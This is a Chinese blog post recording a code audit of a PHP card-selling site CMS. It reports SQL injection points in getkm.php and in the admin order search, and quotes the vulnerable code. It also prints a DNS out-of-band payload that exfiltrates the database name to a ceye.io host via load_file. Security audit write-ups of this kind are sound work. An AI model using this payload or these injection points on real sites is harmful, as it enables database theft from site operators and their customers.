記一次髮卡網程式碼審計

0X7e發表於2020-10-28

前言

好胸弟檸楓昨天dd了我一下，這不，叫我一起審計髮卡的cms

君無戲言，最近也在整二進位制，當然要跟我的好胸弟一起組隊py一下，不知道我都多久沒審了，吐

我們語文也不是很好，各位看官就將就著看看就好，水文勿噴

0x01. 首頁功能點審計

開啟一看，發現不是mvc框架了，那就感覺沒啥好看頭了，對於髮卡網這種功能一般情況下是沒多少功能點讓我getshell的（可能是我太菜，大佬也可以審計一波，交流交流）

直接進來看一下發現這邊沒啥可以利用的，莫得慌，我們按照功能點來測，先買一下東西，抓個包，看下是神馬

這邊請求到了ajax.php這個頁面，好傢伙，我們就直接去ajax.php審計一波

咦？？這這這，這直接拼接的嗎，把我給整神了，一看到在where後面，完了

寫死了，這沒啥子用呀，拼接了也執行不了啥直接把條件寫死了，我們繼續往下看看

本以為這邊有愛情，我覺得我又行了，進去_if函式一看喲西，頭大了，我絲毫不慌，我們們隨緣挖洞，就不信全部都過濾了（好吧，關鍵地方就是過濾了）

可能我追求速度，沒那麼認真，然後粗略一看，我們繼續看其他地方有沒有

最後發現 C:\Users\86183\Desktop\faka\template\chiji\getkm.php 存在注入

也就是 getkm.php 存在注入，我們直接去看看這個頁面，我們可以看到它這邊是必會執行這下面這條語句，我們就直接在post包中新增 tqm 這個引數就行

template裡面是個模板，然後模板裡面都存在 getkm.php，也就是說都存在這個注入

於是扔給了sqlmap跑，但是我發現這邊不準確，不知道為什麼，我本地搭建的也會延遲，等了好久，沒有反應；

那就想想其他騷姿勢，沒有 mysql_error() 函式，報錯注入就算了；

腦瓜子一轉，我覺得可以使用 dns帶外進行注入，說淦就淦

先去構造一下payload

tqm=1' and (select load_file(concat('\\\\',(select database()),'.pdkzwo.ceye.io\\aaa')))#

這就成功的執行了~~

轉眼看看sqlmap

還是就這樣吧......

0x02. 後臺功能點

然後我們就在這個訂單這邊審計，看看能審計出什麼

<?php
$pagesize=30;
$pages=intval($numrows/$pagesize);
if ($numrows%$pagesize)
{
 $pages++;
 }
if (isset($_GET['page'])){
$page=intval($_GET['page']);
}
else{
$page=1;
}
$offset=$pagesize*($page - 1);

if(!empty($_GET['act']) && $_GET['act'] != null && $_GET['act'] == "sousuo"){
    $pz = $_POST['pz'];
    $sql = "SELECT * FROM if_order WHERE  out_trade_no like '%$pz%' or trade_no like '%$pz%' or rel  like '%$pz%'   order by id desc ";
}else{
    $sql = "SELECT * FROM if_order WHERE{$sql} order by id desc limit $offset,$pagesize";
    // echo $sql;
}

$rs=$DB->query($sql);
while($res = $DB->fetch($rs))
{
echo '<tr><td>'.$res['out_trade_no'].'<br>'.$res['trade_no'].'</td>'
        . '<td>'.getName($res['gid'],$DB).'</td><td>'.$res['rel'].'</td>'
        . '<td>'.$res['endTime'].'</td><td>'.$res['number'].'</td><td>￥'.$res['money'].'('.getPayType($res['type']).')'.'</td><td>'.zt($res['sta']).'</td>';
}
?>

這邊出現intval函式，我們就放棄，然後我們繼續往下看，看到了這一段

這.....完全的典型的注入，這邊我們可以看到act傳參sousuo，POST包傳參pz就行了，注入點是在pz的地方

像我這種指令碼小子，都是扔sqlmap一把梭

然後就這樣了，這個注入還是比較多的，我沒去審計完；

本人程式碼審計一般都是功能點審計，這也是我最常用，實戰中也是比較常用的。功能點審計完後可以看看還有沒有其他的漏洞，比如新增管理員的時候沒有校驗cookie等等的邏輯漏洞，然後再敏感函式查詢，比如simplexml_load_string，unserilize，命令執行的函式等等

對自助提卡系統的一次程式碼審計
2020-02-04
個人髮卡網原始碼_個人髮卡網原始碼最新版下載
2021-02-01
原始碼
企業髮卡網原始碼_知宇髮卡系統原始碼
2020-12-06
原始碼
記一次完整的PHP程式碼審計——yccms v3.4審計
2023-02-21
PHP
微信髮卡小程式原始碼自動髮卡小程式原始碼帶流量主功能
2021-09-18
原始碼
CSCMS程式碼審計
2022-06-19
PHP程式碼審計
2016-02-19
PHP
什麼是程式碼審計?程式碼審計有什麼好處?
2024-01-30
Graudit程式碼安全審計
2020-09-16
程式碼審計————目錄
2018-06-05
aspx程式碼審計-2
2017-09-21
哪些業務場景需要做程式碼審計?程式碼審計很重要嗎？
2022-01-05
程式碼審計是什麼?程式碼審計操作流程分為幾步？
2023-03-28
網站程式碼漏洞審計挖掘與修復方法
2020-08-13
網站
python 安全編碼&程式碼審計
2020-08-19
Python
微信小程式開發：記一次提審失敗的反饋重審
2024-03-06
微信小程式
鯨/領夢企業髮卡網原始碼修復最新版（搭建教程）
2023-02-11
原始碼
程式碼審計入門總結
2020-08-19
為什麼要做程式碼審計？
2021-12-29
Java程式碼審計入門篇
2018-06-28
Java
網站漏掃服務之程式碼審計安全學習
2021-04-12
網站
程式碼審計工具有哪些?網路安全課程學習
2021-10-14
基於Java關鍵詞審計技巧？網路安全原始碼審計
2020-12-18
Java原始碼
漫畫：如何做一次出色的程式碼審查
2013-02-04
記一次程式碼重構
2018-08-09
[JavaWeb]Shiro漏洞集合——程式碼審計
2022-01-24
JavaWeb
米安程式碼審計 07 越權漏洞
2018-07-24
MVC框架的程式碼審計小教程
2020-10-29
MVC框架
Java 程式碼審計 — 1. ClassLoader
2021-11-27
Java
【PHP程式碼審計】Null字元問題
2017-09-29
PHPNull字元
PHP程式碼審計常用工具
2017-09-10
PHP
PHP程式碼審計學習總結
2013-03-06
PHP
PHP程式碼審計——Day 5-postcard
2024-04-04
PHP
程式碼審查和不良程式設計習慣
2014-03-06
程式設計
2020最新伯樂髮卡系統原始碼
2021-11-30
原始碼
程式碼審計是什麼？網路安全實戰學習技能
2021-03-19
網路安全裡面的程式碼審計難學嗎?如何學習？
2022-02-12
網路安全程式碼審計是什麼?操作流程有哪些？
2023-02-14

記一次髮卡網程式碼審計

前言

0x01. 首頁功能點審計

0x02. 後臺功能點

相關文章